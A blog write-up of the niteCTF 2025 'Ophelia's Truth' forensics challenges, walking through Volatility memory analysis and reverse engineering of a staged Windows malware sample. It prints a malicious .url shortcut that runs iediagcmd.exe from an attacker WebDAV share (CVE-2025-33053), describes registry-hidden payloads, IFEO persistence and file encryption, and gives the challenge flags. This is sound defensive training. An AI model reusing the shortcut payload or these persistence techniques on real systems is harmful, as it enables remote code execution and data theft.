<!DOCTYPE html>
<html lang=en-US data-theme="dark">
	
<script src="/js/plugins/toggleTheme.js"></script>

	<head>
		
<title>niteCTF 2025 - Ophelia's Truth | Blogsite</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/images/headers_icon/logo.webp">
<link href="/css/plugins/print.css" media="print" rel="stylesheet" />

<link rel="stylesheet" href="/css/index.css">


    <meta name="keywords" content="CTF, blog, DFIR, RE, Malware">
    <meta name="description" content="random writeups">



<script src="/js/plugins/jquery.min.js"></script>


<script src="/js/plugins/hljs.min.js"></script>


<script src="/js/plugins/init.js"></script>


<script src="/js/plugins/hide.js"></script>


<script src="/js/plugins/tabs.js"></script>



    







    

	<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 8.1.1"><link rel="alternate" href="/rss.xml" title="Indrath" type="application/rss+xml">
</head>

	<body>
		<header class="sticky-header">
	<nav>
		<div class="nav-left">
			<a href="/" class="logo">
				<img no-lazy src="/images/headers_icon/logo.webp" alt="Quieter">
			</a>
			<ul class="breadcrumb" id="breadcrumb"></ul>
		</div>
		<div class="nav-right">
			<ul>
				
					<li>
						<a href="/">
						  Main
						</a>
					</li>
				
					<li>
						<a href="/archives">
						  Archives
						</a>
					</li>
				
					<li>
						<a href="/about">
						  About me
						</a>
					</li>
								  
			</ul>
		</div>
		<div class="nav-right-close">
			<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
				<path fill="none" d="M0 0h24v24H0z" />
				<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
			</svg>
		</div>

		<div class="sidebar">
    <div class="topo">
        <p>Blogsite</p>
    </div>
    <ul>
        
        <li>
            <a href="/">
                Main
            </a>
        </li>
        
        <li>
            <a href="/archives">
                Archives
            </a>
        </li>
        
        <li>
            <a href="/about">
                About me
            </a>
        </li>
        
    </ul>
    <div class="sidebar-footer">
        
        <a target="_blank" rel="noopener" href="https://github.com/devarjya27">
            <img no-lazy src="/images/bottom_icon/github.webp" alt="Quieter">
        </a>
        
        <a target="_blank" rel="noopener" href="https://www.instagram.com/devarjya27/">
            <img no-lazy src="/images/bottom_icon/instagram.svg" alt="Quieter">
        </a>
        
        <a target="_blank" rel="noopener" href="https://www.linkedin.com/in/devarjya-purkayastha/">
            <img no-lazy src="/images/bottom_icon/linkedin.svg" alt="Quieter">
        </a>
        
        <a target="_blank" rel="noopener" href="https://x.com/dv_xrt_jyx27">
            <img no-lazy src="/images/bottom_icon/rss.png" alt="Quieter">
        </a>
        
    </div>
</div>
<div class='shelter'>
    <script>
        $(function() {
            $('.nav-right-close > svg').click(function() {
                $('.sidebar').animate({
                    right: "0"
                }, 500);
                $('.shelter').fadeIn("slow");
            
                var element = $('.topo');
                element.addClass('custom-style');
            
                var links = null;
                if ("") {
                    links = "".split(',');
                } else {
                    links = "/images/hades/Wallpaper_Zagreus01.jpg,/images/hades/Wallpaper_Tartarus.jpg,/images/hades/Wallpaper_Thanatos.png,/images/hades/Wallpaper_Hermes.png,/images/hades/4K_OpeningChamber.jpg,/images/hades/4K_Hades_HouseOfHades.jpg".split(',');
                }
            
                var randomLink = typeof pickWallpaper === 'function' ? pickWallpaper(links, 'quieter:sidebar-wallpaper') : links[Math.floor(Math.random() * links.length)];
                element.css('background-image', "url('" + randomLink + "')");
            });
          
            $('.shelter').click(function(e) {
                $('.sidebar').animate({
                    right: "-100%"
                }, 500);
                $('.shelter').fadeOut("slow");
            });
        });      
    </script>
</div>

	</nav>

	
		<div class="header-background"></div>
	

	<script>
		const name = 'post';
		const ul = document.querySelectorAll('.nav-right ul')[0];
		const lis = ul.querySelectorAll('li');

		if (name == 'home') {
			lis[0].classList.add('select');
		} else {
			for (let i = 0; i < lis.length; i++) {
				const li = lis[i];
				const a = li.querySelector('a');
				if (name === a.href.split('/')[3]) {
					li.classList.add('select');
				}
			}
		}
	</script>
	
	<script>
		var element = document.querySelector('.header-background');
		if(element) {
			element.classList.add('custom-style');
			var links = null;
			if (name === 'home' && "/images/hades/4K_OpeningChamber.jpg") {
				links = ["/images/hades/4K_OpeningChamber.jpg"];
			} else if("")
			{
				links = "".split(',');
			} else
			{
				links = "/images/hades/Wallpaper_Zagreus01.jpg,/images/hades/Wallpaper_Tartarus.jpg,/images/hades/Wallpaper_Thanatos.png,/images/hades/Wallpaper_Hermes.png,/images/hades/4K_OpeningChamber.jpg,/images/hades/4K_Hades_HouseOfHades.jpg".split(',');
			}
			var randomLink = typeof pickWallpaper === 'function' ? pickWallpaper(links, 'quieter:header-wallpaper') : links[Math.floor(Math.random() * links.length)];
			element.style.backgroundImage = "url('" + randomLink + "')";
		}
	</script>

	
<script src="/js/plugins/breadcrumb.js"></script>

	<script>
		var menus_title = [];
		
			menus_title.push({home: 'Main'});
		
			menus_title.push({archives: 'Archives'});
		
			menus_title.push({about: 'About me'});
		
		
			
		
	</script>
</header>


<div class="main-wrapper">
    <main class="post">
        <header class="main-header">
	
		
			
				
<link rel="stylesheet" href="/css/plugins/fancybox.css">

				
<script src="/js/plugins/fancybox.umd.js"></script>

				
<script src="/js/plugins/fancybox.js"></script>

			
			<div class="post-header-background-content">
				<ul class="post-header-tag">
					
				</ul>
				
				<h1>niteCTF 2025 - Ophelia's Truth</h1>
		
				
		
				<div class="post-header-info">
					<svg t="1604839279282" class="icon" viewBox="0 0 1024 1024" version="1.1"
					xmlns="http://www.w3.org/2000/svg" p-id="2901" width="20" height="20">
						<path
							d="M513 956.3c-247.7 0-448-200.3-448-448S265.3 66.2 513 66.2s448 200.3 448 448-200.3 442.1-448 442.1z m0-830.9c-212.2 0-388.8 170.7-388.8 388.8C124.2 726.3 294.9 903 513 903c212.2 0 388.8-170.7 388.8-388.8S725.2 125.4 513 125.4z m0 430.2c-94.2 0-170.7-76.5-170.7-170.7S418.8 207.8 513 207.8s170.7 76.5 170.7 170.7S607.2 555.6 513 555.6z m0-289.1c-64.6 0-112 52.8-112 112s47.4 117.9 112 117.9 112-52.8 112-112-47.4-117.9-112-117.9z m0 689.8c-135.7 0-259-58.7-341.9-158.9l-11.8-17.8 11.8-17.8c76.5-117.9 206.2-188.5 347.8-188.5 135.7 0 265 64.6 341.9 182.6l11.8 17.8-11.8 17.8C778 897.1 648.7 956.3 513 956.3zM230.3 773.2C300.9 849.7 406.9 897 513 897c112 0 218.1-47.4 288.6-129.8-70.5-88.2-170.7-135.6-282.7-135.6s-218.1 53.3-288.6 141.6z"
							p-id="2902" fill="#ffffff"></path>
					</svg>
					<div class="post-header-info-author">
						<a href="/about">Indrath</a>
					</div>
					
						<div class="post-header-info-categories">
							
						</div>
					
					<time>2025/12/15</time>
				</div>
		
				
					<div class="post-header-stat">
						<svg version="1.0" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
						viewBox="0 0 200 200" enable-background="new 0 0 200 200" xml:space="preserve" width="20" height="20">
							<path fill="#FFFFFF" d="M187.2,165.6c0,2.6-2.1,4.7-4.7,4.7H17.5c-2.6,0-4.7-2.1-4.7-4.7s2.1-4.7,4.7-4.7h165.1
								C185.2,160.9,187.2,163,187.2,165.6z"/>
							<path fill="#FFFFFF" d="M17.5,29.7c2.6,0,4.7,2.1,4.7,4.7v131.2c0,2.6-2.1,4.7-4.7,4.7s-4.7-2.1-4.7-4.7V34.4
								C12.8,31.8,14.9,29.7,17.5,29.7z M77.9,91.5c1.8,1.8,1.8,4.8,0,6.6l-39.8,39.8c-1.9,1.8-4.9,1.7-6.6-0.2c-1.7-1.8-1.7-4.6,0-6.4
								l39.8-39.8C73.1,89.6,76,89.6,77.9,91.5z M169.9,70.2c1.6,2.1,1.1,5-0.9,6.5c0,0,0,0,0,0l-64.2,48.2c-2.1,1.5-5,1.1-6.6-0.9
								c-1.6-2.1-1.1-5,0.9-6.5c0,0,0,0,0,0l64.2-48.2C165.4,67.7,168.3,68.1,169.9,70.2L169.9,70.2z"/>
							<path fill="#FFFFFF" d="M104.6,124.5c-1.8,1.8-4.8,1.8-6.6,0L71.6,98.1c-1.8-1.8-1.8-4.8,0-6.6c1.8-1.8,4.8-1.8,6.6,0l26.3,26.3
								C106.4,119.6,106.4,122.6,104.6,124.5C104.6,124.4,104.6,124.4,104.6,124.5z"/>
						</svg>
		
						
							
<script src="/js/plugins/wordCount.js"></script>

							<p class="post-count">Word Count: ---</p>
						
		
						
							<p id="busuanzi_container_page_pv" style='display:none;'>Reading count: <span id="busuanzi_value_page_pv"></span></p>
						
					</div>
				
			</div>
		
	
</header>

        <div class="post-content article-container">
            <article class="post-content-info">
                <h1 id="Ophelia’s-Truth-1"><a href="#Ophelia’s-Truth-1" class="headerlink" title="Ophelia’s Truth 1"></a>Ophelia’s Truth 1</h1><blockquote>
<p>A detective at Moscow PD, Department 19, receives a message asking him to check the forensic analysis portal for a DNA report. Attached to the message is a file containing a link to the portal. He opens the attachment, but initially, nothing seems to happen, so he overlooks it. Later, he realizes that a crucial file from an ongoing case has gone missing.</p>
<p>He has provided the forensic artifacts from his computer to you, his colleague at the cyber forensics department, to figure out what went wrong. Find:</p>
<ul>
<li>The filename of the attachment</li>
<li>The ip from where the malware was executed</li>
<li>The CVE the attacker exploited</li>
</ul>
<p>Flag format: nite{file_name.ext_XXX.XXX.XXX.XXX_CVE-XXXX-XXXXX}</p>
<p>Challenge Link: <a target="_blank" rel="noopener" href="https://drive.proton.me/urls/WTX8DDNBWG#gtNS5LAjkzfN">https://drive.proton.me/urls/WTX8DDNBWG#gtNS5LAjkzfN</a></p>
</blockquote>
<p><strong>Flag:</strong> <code>nite&#123;dna_analysis_portal.url_10.72.5.205_CVE-2025-33053&#125;</code></p>
<p>Keeping the description in mind, we start by searching for relevant file artifacts using <code>filescan</code>. The extension <code>.url</code> is a common shortcut format in Windows, often used for web links.</p>
<p>We can search for files containing “dna” or with the <code>.url</code> extension:<br><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">python vol.py -f ophelia.raw windows.filescan.FileScan | grep dna<br><br>0xc50d0c562a90.0\Users\Igor\Documents\Important Links\dna_analysis_portal.url<br></code></pre></td></tr></table></figure></p>
<p>Next, we extract the file content to understand its behavior. We use the virtual address found in the previous step:<br><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">python vol.py -f ophelia.raw windows.dumpfiles.DumpFiles --virtaddr=0xc50d0c562a90<br></code></pre></td></tr></table></figure><br>Despite the “Error dumping file” message the content is successfully dumped. The content of the dumped <code>.url</code> file reveals a specific structure:<br><figure class="highlight ini"><table><tr><td class="code"><pre><code class="hljs ini"><span class="hljs-section">[InternetShortcut]</span><br><span class="hljs-attr">URL</span>=C:\Program Files\Internet Explorer\iediagcmd.exe<br><span class="hljs-attr">WorkingDirectory</span>=\\<span class="hljs-number">10.72</span>.<span class="hljs-number">5.205</span>\webdav\\<br><span class="hljs-attr">ShowCommand</span>=<span class="hljs-number">7</span><br><span class="hljs-attr">IconIndex</span>=<span class="hljs-number">13</span><br><span class="hljs-attr">IconFile</span>=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe<br><span class="hljs-attr">Modified</span>=<span class="hljs-number">20</span>F06BA06D07BD014D<br></code></pre></td></tr></table></figure></p>
<p>This is not a standard web shortcut. Instead of pointing to a website, the <code>URL</code> field points to a local system binary: <code>iediagcmd.exe</code> and the <code>WorkingDirectory</code> is set to a remote UNC path: <code>\\10.72.5.205\webdav\\</code>.</p>
<p>This configuration matches the signature of <strong>CVE-2025-33053</strong>.</p>
<p>When the user clicks this link, Windows executes <code>iediagcmd.exe</code>. This legitimate helper program attempts to launch another executable (in our case it happens to be <code>route.exe</code>). Because the <code>WorkingDirectory</code> is hijacked to point to the attacker’s WebDAV server, <code>iediagcmd.exe</code> inadvertently loads and executes <code>route.exe</code> hosted on <code>10.72.5.205</code> instead of the expected local file.</p>
<h1 id="Ophelia’s-Truth-2"><a href="#Ophelia’s-Truth-2" class="headerlink" title="Ophelia’s Truth 2"></a>Ophelia’s Truth 2</h1><blockquote>
<p>Our initial analysis suggests that the attacker executed a dropper on the victim’s machine via RCE, but the executable shows signs of partial corruption, affecting its tailing ends. The malware appears to have deployed an additional executable on the system. Find out:</p>
<ul>
<li>The name of the dropped executable.</li>
<li>The paths where the encrypted original malware (dropper) is stored currently.</li>
<li>The key used to decrypt and execute the original malware.</li>
</ul>
<p>Flag format: nite{dropped.exe_SOME\EXAMPLE\Path\1_SOME\EXAMPLE\Path\2_SOME\EXAMPLE\Path\3_keyinhex}</p>
</blockquote>
<p><strong>Flag:</strong> <code>nite&#123;RuntimeBroker.exe_HKEY_CURRENT_USER\SOFTWARE\Skype\Username_HKEY_CURRENT_USER\SOFTWARE\Skype\LastProfile_HKEY_CURRENT_USER\SOFTWARE\Skype\SkypePath_90b2cca7c0631aeda7ab1221c98fb1803a6dce2808efdd99e94f5e7cad3a4e78&#125;</code></p>
<p>Now as the description mentions that the dropper dropped a executable onto the system, we can start looking for executables on the victims system and look for inconsistencies.</p>
<p>After some searching you will find that a <code>RuntimeBroker.exe</code> is located at <code>\Users\Igor\AppData\Local\Temp\RuntimeBroker.exe</code>. RuntimeBroker is a system executable and is only present at <code>\Windows\System32\</code>. Now we dump the executable for further analysis.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">python vol.py -f ophelia.raw windows.dumpfiles.DumpFiles --virtaddr=0xc201a7024e20<br>Volatility 3 Framework 2.26.2<br>Progress:  100.00               PDB scanning finished<br>Cache   FileObject      FileName        Result<br><br>ImageSectionObject      0xc201a7024e20  RuntimeBroker.exe       file.0xc201a7024e20.0xc2019fddaa20.ImageSectionObject.RuntimeBroker.exe.img<br></code></pre></td></tr></table></figure>
<p>Decompiling and analysing the dumped exe will tell us the following:</p>
<ul>
<li><p>All of the paths and strings are obfuscated with the XOR key <code>0xCAFEBABE</code>.</p>
</li>
<li><p>It retrieves strings from three specific values: <code>Username</code>, <code>LastProfile</code>, and <code>SkypePath</code>. These strings are are then concatenated together.</p>
</li>
<li><p>Then searches for files in the user’s <code>%TEMP%</code> directory with the pattern <code>wct*.tmp</code>. It then checks if the size of the file equals <code>64</code> bytes. This is a strong indicator that the file contains a hex-encoded 256-bit key.</p>
</li>
<li><p>Once the key is read from the temp file, the malware AES-256-CBC decrypts the concated registry string. The IV is not read from a file but is hardcoded. It is stored as an obfuscated byte array. The IV happens to be <code>9b5c9b7e83cdfbdf11f87195c3192a47</code></p>
</li>
<li><p>After successful decryption, the malware generates a pseudo-random filename beginning with <code>WUDFHost_</code> (mimicking the Windows User-mode Driver Framework Host) and ending with <code>.exe</code>. It writes the decrypted bytes to this file in the <code>%TEMP%</code> directory and immediately executes it.</p>
</li>
</ul>
<p>This represents a multi-stage infection where the first stage encrypts and hides itself, while this second stage (RuntimeBroker.exe) acts as the loader that reconstructs and executes the original malware.</p>
<p>The original malware paths reconstruct to - <code>HKEY_CURRENT_USER\SOFTWARE\Skype\Username</code>, <code>HKEY_CURRENT_USER\SOFTWARE\Skype\LastProfile</code> and <code>HKEY_CURRENT_USER\SOFTWARE\Skype\SkypePath</code></p>
<p>Now to get the key, you can <code>filescan</code> for files that have <code>wct</code> in their name:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">python vol.py -f ophelia.raw windows.filescan.FileScan | grep wct<br><br>0xc201a5c8ba40.0\Users\Igor\AppData\Local\Temp\wct8774.tmp<br>0xc201a702fd20  \Users\Igor\AppData\Local\Temp\wct3550.tmp<br></code></pre></td></tr></table></figure>
<p>But dumping them wont work. We need to find an alternative, we know for a fact that the original dropper saved the key in one of these files which the dropped exe uses, so its definite that the key is somewhere in the memory its just that volatility has failed to map the contents of the file to the key files address. So instead one needs to look for strings that are 64 bytes in length via strings.</p>
<p>The dump contains a large number of 64‑byte strings, so identifying the correct key requires generating a wordlist of all potential candidates. Each key should be tested with the known IV to decrypt the Skype registry data. If we look at the description, it mentions that the executable is corrupted at its later sections. But since AES is a block cipher, we can still recover the correct key by decrypting just the initial blocks and checking for the ‘MZ’ signature.</p>
<p>The key which decrypts all the registries successfuly to give an executable is the correct key.</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">python vol.py -f ophelia.raw windows.registry.printkey --key &quot;Software\\Skype&quot; &gt; skype.txt<br></code></pre></td></tr></table></figure>
<p>We can write a <a href="decrypt_skype.py">python script</a> to decrypt the registries (we can just focus on the first registry <code>Username</code> and look for the MZ bytes).<br><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">ciphertext: 1668096 bytes, keys: 1253<br>FOUND AES‑256 KEY: 90b2cca7c0631aeda7ab1221c98fb1803a6dce2808efdd99e94f5e7cad3a4e78<br></code></pre></td></tr></table></figure></p>
<p>The list of potential keys is here: <a href="potentialkeys.txt">potentialkeys.txt</a></p>
<p>Hence, the final flag is: <code>nite&#123;RuntimeBroker.exe_HKEY_CURRENT_USER\SOFTWARE\Skype\Username_HKEY_CURRENT_USER\SOFTWARE\Skype\LastProfile_HKEY_CURRENT_USER\SOFTWARE\Skype\SkypePath_90b2cca7c0631aeda7ab1221c98fb1803a6dce2808efdd99e94f5e7cad3a4e78&#125;</code></p>
<p>Another valid flag is: <code>nite&#123;RuntimeBroker.exe_HKCU\SOFTWARE\Skype\Username_HKCU\SOFTWARE\Skype\LastProfile_HKCU\SOFTWARE\Skype\SkypePath_90b2cca7c0631aeda7ab1221c98fb1803a6dce2808efdd99e94f5e7cad3a4e78&#125;</code></p>
<p>Challenge Source Code:</p>
<ul>
<li><a href="RuntimeBroker.cpp">RuntimeBroker.exe Source</a></li>
</ul>
<h1 id="Ophelia’s-Truth-3"><a href="#Ophelia’s-Truth-3" class="headerlink" title="Ophelia’s Truth 3"></a>Ophelia’s Truth 3</h1><blockquote>
<p>Igor discovers that the missing file was actually CCTV footage related to the case surrounding his mother’s death. With this revelation, the investigation now shifts toward the dropper. Your task is to determine what the dropper does and recover the missing file. After extensive efforts by the cyber forensics department, they have successfully recovered an uncorrupted version of the dropper, and it has now been provided to you for analysis. Find:</p>
<ul>
<li>The name of the file that went missing</li>
<li>Name of the file where its now hidden</li>
<li>Size of the original file in bytes</li>
<li>Number of frames in the original file</li>
<li>Dimensions of the original file</li>
</ul>
<p>Along with the challenge file from Ophelia’s Truth 1, the attached file is also required to solve the challenge.</p>
<p><code>Note: The binary is a live malware, please exercise caution.</code></p>
<p>File Link: <a target="_blank" rel="noopener" href="https://drive.proton.me/urls/J88R557TTW#ZYm4lTfXFEOS">https://drive.proton.me/urls/J88R557TTW#ZYm4lTfXFEOS</a></p>
<p>Password: infected</p>
<p>Flag format: nite{cctv_footage_file.ext_hidden_file.ext_12345_12345_12345X12345}</p>
</blockquote>
<p><strong>Flag:</strong> <code>nite&#123;20250627_103005_CAM01.avi_thumbcache_777.db_483596_128_1280X720&#125;</code></p>
<p>Upon decompiling the given executable, we can see that it does the following:</p>
<ul>
<li>The malware iterates through the user’s <code>%USERPROFILE%\Videos</code> directory. It specifically searches for a file named <code>20250627_103005_CAM01.avi</code>.</li>
<li><p>Once found, the file moved and encrypted. The malware reads the video file, encrypts it, and saves it to: <code>%LOCALAPPDATA%\Microsoft\Windows\Explorer\thumbcache_777.db</code>. The original video file is then deleted.</p>
</li>
<li><p>To ensure continued access, the malware establishes persistence by hijacking a legitimate application. It modifies the <strong>Image File Execution Options (IFEO)</strong> registry key for <code>AcroRd32.exe</code> (Adobe Acrobat Reader) and sets dropped payload as “Debugger” So every time the user opens a PDF, Windows checks this registry key and launches the “Debugger” (our malware).</p>
</li>
<li><p>The malware statically links the <strong>Crypto++</strong> library. Then the <code>.avi</code> file is encrypted using DES in ECB mode. The key is hardcoded in the binary. The key happens to be <code>6B 73 79 70 75 6E 6E 0B</code>.</p>
</li>
</ul>
<p>To get the key, one can take advantage of a peculiar thing the binary does. You will see that <code>sub_14008BDF0</code> is where all the paths are initialized, with the <code>wct*.tmp</code> path (AES key path) also being initialized in the same function. This function gets called in <code>sub_14008BCC0</code> and it can be seen that the same path is used to store the AES key as well as the DES key.</p>
<p>First the DES key gets stored via <code>sub_14008B4B0</code> and then later the AES key gets stored in the same path via <code>sub_14008A6F0</code>. So if we set up a breakpoint after <code>sub_14008B4B0</code> and run it in a VM, we can get the key.</p>
<img src="/2025/12/15/ophelias_truth/1.png" class="">
<p>Now you can run it and look for files of size 8 bytes (as we know thats the size of the DES key)<br><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">find <span class="hljs-string">&#x27;./AppData/Local/Temp&#x27;</span> -maxdepth 1 -name <span class="hljs-string">&quot;wct*.tmp&quot;</span> -size 8c<br>./AppData/Local/Temp/wctCCD7.tmp<br><br>xxd <span class="hljs-string">&#x27;./AppData/Local/Temp/wctCCD7.tmp&#x27;</span><br>00000000: 6b73 7970 756e 6e0b                      ksypunn.<br></code></pre></td></tr></table></figure></p>
<p>Now we know that the encrypted file is stored as <code>thumbcache_777.db</code>, lets try filescan on it:<br><figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash"> python vol.py -f ophelia.raw windows.filescan.FileScan | grep thumbcache<br><br>0xc201a3dc8910.0\Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_777.db<br>0xc201a485c900  \Windows\System32\thumbcache.dll<br>0xc201a485dd50  \Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db<br>0xc201a485ecf0  \Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db<br>0xc201a4868480  \Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db<br>0xc201a486c490  \Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db<br>0xc201a4b7ec60  \Users\Igor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db<br></code></pre></td></tr></table></figure></p>
<p>Now we can try dumping, but again just like the key file in the last challenge, it won’t work so we need to look for an alternative. The trick here is to look for common bytes in <code>avi</code> files, decrypt accordingly, then search for the encrypted bytes in the dump.</p>
<p>There are a bunch of common bytes, for eg - <code>RIFF</code>, <code>AVI</code> (the file signatures) but DES requires 8 byte blocks so we need longer sequence of bytes such as <code>hdrlavih8</code>, <code>strlstrh8</code>, etc. The longer sequence of bytes is not universal but very common and should be worth a try.</p>
<p>But the logical thing to try is encrypt <code>AVI LIST</code> as LIST is what is used to list the chunks of the AVI file and is usually what follows after the AVI header.</p>
<p>The encrypted hex of <code>AVI LIST</code> is <code>85 88 5b ac 9f f4 75 5d</code>.</p>
<p>Now lets search for these hex in the dump.<br><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">xxd ophelia.raw | grep -E &#x27;8588 5bac 9ff4 755d&#x27; -A 10 -B 1<br><br>1b78ca850: 0000 0000 0000 0000 0000 0000 46b5 b743  ............F..C<br>1b78ca860: c23d 31ea 8588 5bac 9ff4 755d 85c8 477c  .=1...[...u]..G|<br>1b78ca870: 48fc 856f 905f d1a5 576b 6ad2 d243 9825  H..o._..Wkj..C.%<br>1b78ca880: e5a9 de74 d3bb 0dcd 3bb1 a3bb 5b05 4acd  ...t....;...[.J.<br>1b78ca890: 5875 b3cc c036 bc41 ec10 9eef f838 748d  Xu...6.A.....8t.<br>1b78ca8a0: 2ab0 4116 1d61 0b3a fcd5 730a 1d61 0b3a  *.A..a.:..s..a.:<br>1b78ca8b0: fcd5 730a 3ee3 1249 6184 0ce5 f6d4 689b  ..s.&gt;..Ia.....h.<br>1b78ca8c0: 7e50 38cb b7d9 651d febb fd43 47d7 392a  ~P8...e....CG.9*<br>1b78ca8d0: f53f d7ea 1d61 0b3a fcd5 730a 74d7 3f5e  .?...a.:..s.t.?^<br>1b78ca8e0: 5ec4 331d 2757 08a7 33a6 26f0 90b0 b9fb  ^.3.&#x27;W..3.&amp;.....<br>1b78ca8f0: f010 a012 1d61 0b3a fcd5 730a 65dd 0768  .....a.:..s.e..h<br>1b78ca900: 3ced 1f7a cb8f 16b2 8587 0408 f838 748d  &lt;..z.........8t.<br></code></pre></td></tr></table></figure></p>
<p>Voila!<br><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">1b78ca860: 46b5 b743 c23d 31ea 8588 5bac 9ff4 755d<br>                               └──────────────────┘<br>                               Encrypted &quot;AVI LIST&quot;<br></code></pre></td></tr></table></figure></p>
<p>Now looking at the 8 bytes before the encrypted AVI LIST we get - <code>46b5 b743 c23d 31ea</code> which is just <code>RIFF &lt;file size&gt;</code>. We can decrypt these 8 bytes to get the size of the avi file.</p>
<p>The bytes <code>46 b5 b7 43 c2 3d 31 ea</code> upon decryption is  <code>82 73 70 70 4 97 7 0</code>. Which corresponds to <code>483,588 bytes</code>. Now this is actually the size of the file post the 8 bye header, so to get the total size we add <code>8</code> to <code>483,588</code>, thus the total size of the file is <code>483,596</code> bytes.</p>
<p>To get the information required for the flag we need to focus on the starting few bytes of the file, then decrypt accordingly. The decrypted file looks something like this:<br><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">00000000: 5249 4646 0461 0700 4156 4920 4c49 5354  RIFF.a..AVI LIST<br>00000010: 3812 0000 6864 726c 6176 6968 3800 0000  8...hdrlavih8...<br>00000020: 3582 0000 a861 0000 0000 0000 1009 0000  5....a..........<br>00000030: 8000 0000 0000 0000 0100 0000 0000 1000  ................<br>00000040: 0005 0000 d002 0000 0000 0000 0000 0000  ................<br>00000050: 0000 0000 0000 0000 4c49 5354 e010 0000  ........LIST....<br>00000060: 7374 726c 7374 7268 3800 0000 7669 6473  strlstrh8...vids<br>00000070: 464d 5034 0000 0000 0000 0000 0000 0000  FMP4............<br>00000080: 0100 0000 1e00 0000 0000 0000 8000 0000  ................<br>00000090: ddb8 0000 ffff ffff 0000 0000 0000 0000  ................<br>000000a0: 0005 d002 7374 7266 2800 0000 2800 0000  ....strf(...(...<br>000000b0: 0005 0000 d002 0000 0100 1800 464d 5034  ............FMP4<br>000000c0: 0030 2a00 0000 0000 0000 0000 0000 0000  .0*.............<br>000000d0: 0000 0000 4a55 4e4b 1810 0000 0400 0000  ....JUNK........<br>000000e0: 0000 0000 3030 6463 0000 0000 0000 0000  ....00dc........<br><br></code></pre></td></tr></table></figure><br>To get number of frames we look at bytes at offset <code>0x30</code>, we get number of frames as <code>128</code>. And at offset <code>0xd0</code> we get <code>0005 0000 d002 0000</code> which translates to <code>1280</code> pixels in height and <code>720</code> pixels in width.</p>
<p>Hence, our final flag - <code>nite&#123;20250627_103005_CAM01.avi_thumbcache_777.db_483596_128_1280X720&#125;</code></p>
<p>Challenge Source Code:</p>
<ul>
<li><a href="route.cpp">route.exe Source</a></li>
</ul>

            </article>
            
	<aside class="rightside">
	
		<div class="rightside-button not-toc-button" id="js-aside">
			<span>
				<img no-lazy src="/images/icon/aside.png" class="rightside-button-icon" alt="Icon">
			</span>
		</div>
		<script>
			$("#js-aside").click(function () {
				onShowAsideButton();
			});
		</script>
	
	
<script src="/js/plugins/goto_position.js"></script>

	
	<div class="rightside-button" id="js-go_top">
		<span>
			<img no-lazy src="/images/icon/go_top.png" class="rightside-button-icon" alt="Icon">
		</span>
	</div>
	<div class="rightside-button" id="js-go_bottom">
		<span>
			<img no-lazy src="/images/icon/go_bottom.png" class="rightside-button-icon" alt="Icon">
		</span>
	</div>

	<script>
		$('#js-go_top')
		.gotoPosition( {
			speed: 300,
			target: 'top',
		} );
		$('#js-go_bottom')
		.gotoPosition( {
			speed: 300,
			target: 'bottom',
		} );
	</script>
</aside>



<div class="post-bottom">
    
        <div class="post-paging">     
            <div class="post-paging-last">
                
            </div>
            <div class="post-paging-next">
                
                    <a href="/2025/12/15/lament_of_the_seraph/">
                        niteCTF 2025 - Lament of the Seraph ->
                    </a>
                
            </div>
        </div>
    
    
    
</div>

        </div>
    </main>
    
        <aside class="main-aside">
    
<script src="/js/widgets/aside.js"></script>

    <script>
        showAside();
    </script>

    <div class="aside-top">
        <div class="aside-top-about aside-card">
            <a href="/about" class="aside-top-about-portrait">
                <img no-lazy src="/about/avatar.png" alt="Q">
            </a>
            <div class="aside-top-about-info">
                <span class="author"> Indrath</span>
                <span class="description">DFIR n RE</span>
            </div>              
            <div class="aside-top-about-site">
                <a href="" class="aside-top-about-site-item">
                    <span class="title"></span>
                </a>
                <a href="" class="aside-top-about-site-item">
                    <span class="title"></span>
                </a>
            </div>
            <div class="aside-top-about-contact">
                
                    
                        <a target="_blank" rel="noopener" href="https://github.com/devarjya27">
                            <img no-lazy src="/images/bottom_icon/github.webp" alt="Quieter">
                        </a>
                    
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/devarjya27/">
                            <img no-lazy src="/images/bottom_icon/instagram.svg" alt="Quieter">
                        </a>
                    
                        <a target="_blank" rel="noopener" href="https://www.linkedin.com/in/devarjya-purkayastha/">
                            <img no-lazy src="/images/bottom_icon/linkedin.svg" alt="Quieter">
                        </a>
                    
                        <a target="_blank" rel="noopener" href="https://x.com/dv_xrt_jyx27">
                            <img no-lazy src="/images/bottom_icon/rss.png" alt="Quieter">
                        </a>
                    
                
            </div>
        </div> 

        
    </div>

    <div class="aside-bottom">
        
    </div>
</aside>

    
</div>
		<footer>
	<div class="content">
		
			<span>©2026&nbsp;By&nbsp;<a href="/about">Indrath</a>.</span>
		
